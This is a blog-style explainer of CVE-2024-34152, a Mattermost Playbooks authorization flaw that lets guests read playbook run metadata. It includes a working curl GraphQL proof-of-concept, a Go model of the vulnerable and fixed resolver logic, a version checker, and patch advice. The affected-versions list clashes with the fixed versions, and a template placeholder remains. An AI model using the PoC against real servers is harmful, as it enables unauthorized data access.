In May 2024, a significant vulnerability was found in Mattermost, a popular self-hosted messaging platform used by many businesses and open-source communities. Cataloged as CVE-2024-34152, this security flaw allows a guest user (someone with limited access) to fetch sensitive playbook run metadata just by sending a GraphQL query, even if they shouldn’t be able to see this information.

Affected Versions

- 8.1.x ≤ 8.1.12

If you’re running Mattermost, keep reading to understand the issue, see how it works, and learn how to protect your users and data.

Understanding the Bug

Mattermost has a Playbooks feature, which helps teams track software incidents and other operational workflows. Each time you use a playbook, it creates a "run" instance. Sensitive data—like names, creators, timestamps, etc.—is stored as "playbook run metadata".

Mattermost allows guests to access public channels, but it should not allow them to poke into playbook runs they don't own or control. Unfortunately, versions listed above fail to check if a guest should see the metadata for a playbook run if that run is *linked* to a channel the guest can access.

A guest user can simply fire a query using the RHSRuns GraphQL API and Mattermost will happily reveal info it shouldn’t.

- The guest sends a standardized RHSRuns GraphQL query to the Mattermost server.
- The server responds with metadata about these playbook runs—creator, creation date, and maybe more.

Here’s a proof-of-concept code snippet using curl to extract playbook run metadata as a guest:

curl -k \
  -H "Authorization: Bearer <GUEST_USER_TOKEN>" \
  -H "Content-Type: application/json" \
  -X POST https://<mattermost-domain>/plugins/playbooks/api/v/graphql \
  -d '{
        "query": "query RHSRuns($teamID: String!, $channelID: String!) { rhsRuns(teamID: $teamID, channelID: $channelID) { id name createdAt createdBy } }",
        "variables": {
          "teamID": "<TEAM_ID>",
          "channelID": "<CHANNEL_ID>"
        }
      }'

Replace:

- <GUEST_USER_TOKEN> with the actual guest account token (easily grabbed via Chrome DevTools after login).
- <mattermost-domain> with your Mattermost server address.
- <TEAM_ID> and <CHANNEL_ID> with correct IDs (these are typically visible to any member of the team/channel).

A more readable version of the same query, as you would write it in a GraphQL client:

query GetPlaybookRuns($teamID: String!, $channelID: String!) {
  rhsRuns(teamID: $teamID, channelID: $channelID) {
    id
    name
    createdAt
    createdBy
  }
}

The server responds with metadata for *all* runs in that channel—even for those a guest *should not* see.
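To make the missing check concrete, here is an added, illustrative Go model of a list resolver like rhsRuns, written for this post. It is not Mattermost's or the Playbooks plugin's code; the types, field names, the "participant" notion and the rule that guests may only see runs they participate in are all assumptions. The vulnerable variant gates only on channel membership (the pattern this CVE describes), while the fixed variant adds an object-level check on every run before it is returned, and filters rather than errors so that the existence of hidden runs is not leaked either.

```go
package main

import (
	"errors"
	"fmt"
)

// Illustrative model only (not Mattermost code); names are assumptions.
type User struct {
	ID      string
	IsGuest bool
}

type PlaybookRun struct {
	ID           string
	Name         string
	ChannelID    string          // channel this run is linked to
	CreatedBy    string
	CreatedAt    int64
	Participants map[string]bool // user IDs that are members of the run
}

type Store struct {
	channelMembers map[string]map[string]bool // channelID -> userID -> member?
	runs           []PlaybookRun
}

var ErrForbidden = errors.New("forbidden")

func (s *Store) isChannelMember(userID, channelID string) bool {
	return s.channelMembers[channelID][userID]
}

// rhsRunsVulnerable shows the flawed pattern: the only gate is channel
// membership, so a guest who can read the linked channel gets metadata for
// every run linked to it.
func (s *Store) rhsRunsVulnerable(u User, channelID string) ([]PlaybookRun, error) {
	if !s.isChannelMember(u.ID, channelID) {
		return nil, ErrForbidden
	}
	var out []PlaybookRun
	for _, r := range s.runs {
		if r.ChannelID == channelID {
			out = append(out, r)
		}
	}
	return out, nil
}

// rhsRunsFixed keeps the channel gate and adds a per-run check, so a guest
// only receives runs they actually participate in.
func (s *Store) rhsRunsFixed(u User, channelID string) ([]PlaybookRun, error) {
	if !s.isChannelMember(u.ID, channelID) {
		return nil, ErrForbidden
	}
	var out []PlaybookRun
	for _, r := range s.runs {
		if r.ChannelID != channelID || !canViewRun(u, r) {
			continue // hidden runs are filtered out, not reported as errors
		}
		out = append(out, r)
	}
	return out, nil
}

// canViewRun is the object-level check. Assumption: non-guest channel members
// may see runs linked to their channel; guests must be run participants.
func canViewRun(u User, r PlaybookRun) bool {
	if !u.IsGuest {
		return true
	}
	return r.Participants[u.ID]
}

// sampleStore builds constructed data: a public channel with two runs, a guest
// who participates in only one of them, and a private channel the guest lacks.
func sampleStore() *Store {
	return &Store{
		channelMembers: map[string]map[string]bool{
			"chan-public":  {"member1": true, "guest1": true},
			"chan-private": {"member1": true},
		},
		runs: []PlaybookRun{
			{ID: "run-a", Name: "DB outage", ChannelID: "chan-public", CreatedBy: "member1", CreatedAt: 1716700000, Participants: map[string]bool{"member1": true}},
			{ID: "run-b", Name: "Vendor onboarding", ChannelID: "chan-public", CreatedBy: "member1", CreatedAt: 1716700100, Participants: map[string]bool{"member1": true, "guest1": true}},
			{ID: "run-c", Name: "Key rotation", ChannelID: "chan-private", CreatedBy: "member1", CreatedAt: 1716700200, Participants: map[string]bool{"member1": true}},
		},
	}
}

func runIDs(runs []PlaybookRun) []string {
	ids := make([]string, 0, len(runs))
	for _, r := range runs {
		ids = append(ids, r.ID)
	}
	return ids
}

func main() {
	s := sampleStore()
	guest := User{ID: "guest1", IsGuest: true}
	v, _ := s.rhsRunsVulnerable(guest, "chan-public")
	f, _ := s.rhsRunsFixed(guest, "chan-public")
	fmt.Println("vulnerable resolver returns:", runIDs(v))
	fmt.Println("fixed resolver returns:     ", runIDs(f))
}
```

The point to take from this is structural: a list resolver needs an authorization decision per returned object, not just one check on the container (the channel) the objects are looked up through.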

Why Does This Matter?

- Metadata can be sensitive: Playbook runs might include incident names, timestamps, descriptions, or creators.
- Information leaks can lead to social engineering: Attackers can map out teams, who authored key workflows, and get insight into incident types and workflows.
- Guest accounts are often less scrutinized: Attackers can pose as external consultants or users, gaining info stealthily.

References

- Official Mattermost Security Advisory
- GitHub commit fixing the issue *(If available, replace with actual URL)*
- CVE-2024-34152 at NVD

Fixed Versions

- Mattermost 9.5.4, 9.6.2, 8.1.13 or later

- Latest releases: Mattermost Download Center
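If you manage several Mattermost deployments, a small version gate saves guessing. The Go snippet below is an added example written for this post (not a Mattermost tool); it encodes only the three fixed releases named above, compares a reported version against the fixed release on the same minor branch, and, as a labelled assumption, treats any branch not named here as patched only when it is newer than the newest fixed release.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// version is major.minor.patch.
type version [3]int

// fixedReleases are the patched versions named in this post, newest first.
var fixedReleases = []version{{9, 6, 2}, {9, 5, 4}, {8, 1, 13}}

// parseVersion accepts "9.5.3" or "v9.5.3"; a "-rc1"/"+build" suffix on the
// patch component is ignored.
func parseVersion(s string) (version, error) {
	s = strings.TrimPrefix(strings.TrimSpace(s), "v")
	parts := strings.Split(s, ".")
	if len(parts) < 3 {
		return version{}, fmt.Errorf("malformed version %q", s)
	}
	if i := strings.IndexAny(parts[2], "-+"); i >= 0 {
		parts[2] = parts[2][:i]
	}
	var v version
	for i := 0; i < 3; i++ {
		n, err := strconv.Atoi(parts[i])
		if err != nil || n < 0 {
			return version{}, fmt.Errorf("malformed version %q", s)
		}
		v[i] = n
	}
	return v, nil
}

// less compares versions lexicographically by component.
func less(a, b version) bool {
	for i := 0; i < 3; i++ {
		if a[i] != b[i] {
			return a[i] < b[i]
		}
	}
	return false
}

// isPatched reports whether the given version carries the CVE-2024-34152 fix.
func isPatched(s string) (bool, error) {
	v, err := parseVersion(s)
	if err != nil {
		return false, err
	}
	for _, f := range fixedReleases {
		if f[0] == v[0] && f[1] == v[1] {
			return !less(v, f), nil // same branch: patched iff >= fixed release
		}
	}
	// Branch not named in this post. Assumption: releases newer than the
	// newest fixed release include the fix; older unnamed branches are
	// treated as unpatched until confirmed otherwise.
	return less(fixedReleases[0], v), nil
}

func main() {
	for _, s := range []string{"8.1.12", "8.1.13", "9.5.3", "9.6.2", "9.7.0"} {
		ok, err := isPatched(s)
		fmt.Printf("%-8s patched=%v err=%v\n", s, ok, err)
	}
}
```

Feed it the version string your server reports and act on anything that comes back false or errors out; the conservative default for unknown branches is deliberate, since "not listed" is not the same as "not affected".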

Conclusion

CVE-2024-34152 is a great example of how small permission-checking mistakes can cause big problems. It’s also a reminder that "metadata" isn’t harmless—sometimes it leaks more than you think.

If you’re using Mattermost Playbooks, especially with external or guest users: patch now. If you’re interested in responsible disclosure or want to dive deeper, make sure to check the official security advisories linked above.

Stay safe and always keep your software up to date!

Timeline

Published on: 05/26/2024 14:15:09 UTC
Last modified on: 05/28/2024 12:39:28 UTC